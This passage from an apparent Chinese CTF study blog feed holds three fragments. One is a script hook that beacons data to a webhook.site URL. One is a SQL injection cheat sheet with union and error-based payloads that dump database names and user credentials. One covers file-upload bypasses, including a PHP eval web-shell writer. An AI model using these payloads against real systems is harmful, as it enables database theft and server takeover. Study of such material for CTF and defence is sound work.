</span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">oldFunc</span>.<span style="color:#a6e22e">apply</span>(document, <span style="color:#a6e22e">arguments</span>) </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> &lt;/<span style="color:#f92672">script</span>&gt; </span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">body</span>&gt; </span></span></code></pre></div><p>or</p> <pre tabindex="0"><code>&lt;!DOCTYPE html&gt; &lt;body&gt; &lt;script&gt; const HOOK_URL = &#34;https://webhook.site/ae22bc03-bb75-4080-9702-36cbb57cc53d&#34;; let sent = false; function hook() { if (sent) return; sent = true; const e = new Error(); navigator.sendBeacon(HOOK_URL, e.stack); } document.getElementById = hook; &lt;/script&gt; &lt;/body&gt; </code></pre>/posts/sql%E6%B3%A8%E5%85%A5/Fri, 20 Oct 2023 18:38:57 +0800/posts/sql%E6%B3%A8%E5%85%A5/<h1 id="sql注入">SQL注入</h1> <p><a href="https://xz.aliyun.com/t/10594#toc-6">SQL注入之Mysql注入姿势及绕过总结 - 先知社区 (aliyun.com)</a>[盲注去这]</p> <h2 id="联合查询">联合查询</h2> <p>很多时候联合查询也会和其他的几种查询方式一起使用。</p> <h5 id="联合查询用到的sql语法知识">联合查询用到的SQL语法知识</h5> <p><code>UNION</code>可以将前后两个查询语句的结果拼接到一起，但是会自动去重。</p> <p><code>UNION ALL</code>功能相同，但是会显示所有数据，不会去重。</p> <p>具有类似功能的还有<code>JOIN</code> <a href="https://blog.csdn.net/julielele/article/details/82023577">https://blog.csdn.net/julielele/article/details/82023577</a> 但是是一个对库表等进行连接的语句，我们在后续的绕过中会提到利用它来进行无列名注入。</p> <h5 id="注入流程">注入流程</h5> <ol> <li> <p>判断是否存在注入，注入是字符型还是数字型，闭合情况，绕过方式</p> <pre tabindex="0"><code>?id=1&#39; ?id=1&#34; ?id=1&#39;) ?id=1&#34;) ?id=1&#39; or 1# ?id=1&#39; or 0# ?id=1&#39; or 1=1# ?id=1&#39; and 1=2# ?id=1&#39; and sleep(5)# ?id=1&#39; and 1=2 or &#39; ?id=1\ </code></pre></li> <li> <p>猜测SQL查询语句中的字段数</p> <ul> <li>使用 order/group by 语句，通过往后边拼接数字指导页面报错，可确定字段数量。</li> </ul> <pre tabindex="0"><code>1&#39; order by 1# 1&#39; order by 2# 1&#39; order by 3# 1 order by 1 1 order by 2 1 order by 3 </code></pre><ul> <li>使用 union select 联合查询，不断在 union select 后面加数字，直到不报错，即可确定字段数量。</li> </ul> <pre tabindex="0"><code>1&#39; union select 1# 1&#39; union select 1,2# 1&#39; union select 1,2,3# 1 union select 1# 1 union select 1,2# 1 union select 1,2,3# </code></pre></li> <li> <p>确定显示数据的字段位置 使用 union select 1,2,3,4,&hellip; 根据回显的字段数，判断回显数据的字段位置。</p> <pre tabindex="0"><code>-1&#39; union select 1# -1&#39; union select 1,2# -1&#39; union select 1,2,3# -1 union select 1# -1 union select 1,2# -1 union select 1,2,3# </code></pre><p>注意：</p> <ul> <li>若确定页面有回显，但是页面中并没有我们定义的特殊标记数字出现，可能是页面进行的是单行数据输出，我们让前边的 select 查询条件返回结果为空即可。</li> <li>⼀定要拼接够足够的字段数，否则SQL语句报错。</li> </ul> </li> <li> <p>在回显数据的字段位置使用 union select 将我们所需要的数据查询出来即可。包括但不限于：</p> <ul> <li>获取当前数据库名</li> </ul> <pre tabindex="0"><code>-1&#39; union select 1,2,database()--+ </code></pre><ul> <li>获取当前数据库的表名</li> </ul> <pre tabindex="0"><code>-1&#39; union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ -1&#39; union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3--+ </code></pre><ul> <li>获取表中的字段名</li> </ul> <pre tabindex="0"><code>-1&#39; union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;--+ -1&#39; union select 1,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;),3--+ </code></pre><ul> <li>获取数据</li> </ul> <pre tabindex="0"><code>-1&#39; union select 1,2,group_concat(id,0x7c,username,0x7c,password) from users--+ -1&#39; union select 1,(select group_concat(id,0x7c,username,0x7c,password) from users),3--+ </code></pre></li> </ol> <p>一般情况下就是这样的一个顺序，<code>确定联合查询的字段数-&gt;确定联合查询回显位置-&gt;爆库-&gt;爆表-&gt;爆字段-&gt;爆数据</code>。</p> <h2 id="报错注入">报错注入：</h2> <h4 id="报错注入用到的sql语法知识">报错注入用到的SQL语法知识</h4> <p>大体的思路就是利用报错回显，同时我们的查询指令或者SQL函数会被执行，<strong>报错的过程可能会出现在查询或者插入甚至删除的过程</strong>中。</p> <h4 id="0x00-floor8xmysql50双查询报错注入">0x00 floor()（8.x&gt;mysql&gt;5.0）[双查询报错注入]</h4> <p>函数返回小于或等于指定值（value）的最小整数,取整</p> <blockquote> <p>通过floor报错的方法来爆数据的<strong>本质是group by语句的报错</strong>。group by语句报错的原因是<code>floor(random(0)*2)</code>的不确定性，即可能为0也可能为1</p> <p>group by key的原理是循环读取数据的每一行，将结果保存于临时表中。读取每一行的key时，<strong>如果key存在于临时表中，则不在临时表中更新临时表中的数据；如果该key不存在于临时表中，则在临时表中插入key所在行的数据。</strong></p> <p>group by <code>floor(random(0)*2)</code>出错的原因是key是个随机数，检测临时表中key是否存在时计算了一下<code>floor(random(0)*2)</code>可能为0，如果此时临时表<strong>只有key为1的行不存在key为0的行</strong>，那么数据库要将该条记录<strong>插入</strong>临时表，由于是随机数，插时又要计算一下随机值，此时<code>floor(random(0)*2)</code>结果可能为1，就会导致插入时<strong>冲突而报错</strong>。即检测时和插入时两次计算了随机数的值。</p> </blockquote> <pre tabindex="0"><code>?id=0’ union select 1,2,3 from(select count(*),concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ /*拆解出来就是下面的语句*/ concat((select concat(version(),’-’,database(),’-’,user()) limit 0,1),floor(rand(0)*2))x </code></pre><p><strong>可以看到这里实际上不光使用了报错注入还是用了刚刚的联合查询，同时还是一个双查询的报错注入，当在一个聚合函数，比如count()函数后面如果使用group by分组语句的话，就可能会把查询的一部分以错误的形式显示出来。但是要多次测试才可以得到报错</strong></p> <p>大体思路就是当在一个聚合函数，比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来，但是因为随机数要测试多次才能得到报错，上面报错注入函数中的第一个<code>Floor()</code>就是这种情况。</p> <h4 id="0x01-extractvalue--------writeup_2023_0xgame_week2---rdjs-blog-notnad3githubio-2-ez_upload例题sql注入">0x01 extractvalue() [Writeup_2023_0xGame_Week2 - rdj&rsquo;s Blog (notnad3.github.io)](<a href="https://notnad3.github.io/2023/10/01/%5BWeek">https://notnad3.github.io/2023/10/01/[Week</a> 2] ez_upload/)【例题，sql注入】</h4> <p>对XML文档进行查询的函数</p> <p>第二个参数 xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</p> <pre tabindex="0"><code>and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5)))) </code></pre><p>其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样</p> <p>语法：extractvalue(目标xml文档，xml路径)</p> <p>第二个参数 xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</p> <p>正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错</p> <p>select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))</p>/posts/file_upload/Tue, 10 Oct 2023 18:38:57 +0800/posts/file_upload/<h1 id="前端绕过">前端绕过</h1> <p>正常上传文件,捉取数据包修改（bp抓包改后缀）</p> <h1 id="后端绕过">后端绕过</h1> <p>服务器端检测的绕过</p> <h2 id="函数特性">函数特性</h2> <p>move_uploaded_file函数会自动去除文件名末尾的点 和 /.</p> <p><code>fopen</code>函数特性</p> <pre tabindex="0"><code>&lt;?php $filename=&#39;1.php/.&#39;; $content=&#34;&lt;?php eval($_POST[1]);?&gt;&#34;; $f = fopen($filename, &#39;w&#39;); fwrite($f, $content); fclose($f); ?&gt; #会在当前目录生成1.php,文件名为1.php.也可以 ———————————————— </code></pre><h5 id="其它">其它</h5> <p>后缀名大小写</p> <p>后缀名双写</p> <p><code>尝试php3 phtml php3457(linux+apache+php5.6)等后缀</code></p> <p>检测MIME类型的,捉包改MIME类型</p> <h3 id="服务端检测mine类型检测-">服务端检测（MINE类型检测） <a href="https://wiki.wgpsec.org/knowledge/ctf/uploadfile.html#%E6%9C%8D%E5%8A%A1%E7%AB%AF%E6%A3%80%E6%B5%8B-mine%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%B5%8B">#</a></h3> <blockquote> <p>MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的因特网标准。</p> </blockquote> <p>服务器代码判断$_FILES[”file“][&ldquo;type&rdquo;]是不是图片格式（<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>），如果不是，则不允许上传该文件。</p> <p>绕过方法：</p> <blockquote> <p>抓包后更改Content-Type为允许的类型绕过该代码限制，比如将php文件的<code>Content-Type:application/octet-stream</code>修改为<code>image/jpeg</code>、<code>image/png</code>、<code>image/gif</code>等就可以</p> </blockquote> <p>常见MIMETYPE</p> <blockquote> <p>audio/mpeg -&gt; .mp3 application/msword -&gt; .doc application/octet-stream -&gt; .exe application/pdf -&gt; .pdf application/x-javascript -&gt; .js application/x-rar -&gt; .rar application/zip -&gt; .zip image/gif -&gt; .gif image/jpeg -&gt; .jpg / .jpeg image/png -&gt; .png text/plain -&gt; .txt text/html -&gt; .html video/mp4 -&gt; .mp4</p>